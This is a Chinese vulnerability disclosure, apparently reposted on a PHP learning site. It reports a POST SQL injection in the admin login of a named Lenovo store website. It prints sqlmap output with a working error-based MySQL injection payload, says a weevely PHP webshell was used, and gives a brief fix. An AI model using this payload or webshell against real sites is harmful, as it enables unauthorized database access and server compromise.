来源:自学PHP网 时间:2015-04-16 23:15 作者: 阅读:次
[导读] 联想产品多业务广,旗下有很多销售业务相关的管理后台,然而部分这类网站的安全状况堪忧。网站:http: www lenovostoreapp com 后台登陆处存在post注入:http: www lenovostoreapp com admin index ph...
联想产品多业务广,旗下有很多销售业务相关的管理后台,然而部分这类网站的安全状况堪忧。 网站:http://www.lenovostoreapp.com/
sqlmap identified the following injection points with a total of 62 HTTP(s) requests: --- Place: POST Parameter: user Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: user=A' AND (SELECT 1917 FROM(SELECT COUNT(*),CONCAT(0x3a68726e3a,(SELECT (CASE WHEN (1917=1917) THEN 1 ELSE 0 END)),0x3a7461763a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'bwuX'='bwuX&upass=A&button=++%E7%99%BB%E5%BD%95++ --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: POST Parameter: user Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: user=A' AND (SELECT 1917 FROM(SELECT COUNT(*),CONCAT(0x3a68726e3a,(SELECT (CASE WHEN (1917=1917) THEN 1 ELSE 0 END)),0x3a7461763a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'bwuX'='bwuX&upass=A&button=++%E7%99%BB%E5%BD%95++
用的是weevely的php马
修复方案:1.post注入,就加上你们业务网站广泛使用的防注入程序就可以了。 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com